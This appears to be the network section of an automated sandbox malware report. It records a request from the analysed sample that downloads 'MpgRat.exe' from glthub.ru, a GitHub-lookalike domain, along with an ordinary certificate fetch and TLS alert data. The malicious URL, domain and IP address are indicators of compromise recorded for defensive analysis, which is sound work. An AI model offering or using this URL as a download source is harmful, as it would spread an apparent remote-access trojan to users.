Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| glthub.ru | 37.140.192.213 | |
| x1.i.lencr.org | 23.40.44.214 |
GET
200
https://glthub.ru/nomame/MpgRat.exe
REQUEST
RESPONSE
BODY
GET /nomame/MpgRat.exe HTTP/1.1
Host: glthub.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 04 Oct 2024 02:21:57 GMT
Content-Type: application/octet-stream
Content-Length: 1405711
Connection: keep-alive
Last-Modified: Thu, 03 Oct 2024 21:07:23 GMT
ETag: "15730f-62398f0dcf568"
Accept-Ranges: bytes
GET
200
http://x1.i.lencr.org/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: x1.i.lencr.org
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/pkix-cert
Last-Modified: Fri, 04 Aug 2023 20:57:56 GMT
ETag: "64cd6654-56f"
Content-Disposition: attachment; filename="ISRG Root X1.der"
Cache-Control: max-age=56382
Expires: Fri, 04 Oct 2024 18:01:39 GMT
Date: Fri, 04 Oct 2024 02:21:57 GMT
Content-Length: 1391
Connection: keep-alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLS 1.2 192.168.56.103:49166 37.140.192.213:443 |
C=US, O=Let's Encrypt, CN=R11 | CN=glthub.ru | c9:b2:71:f6:e5:1a:9d:f7:cc:69:5c:0d:ad:3d:35:00:38:16:53:f0 |
Snort Alerts
No Snort Alerts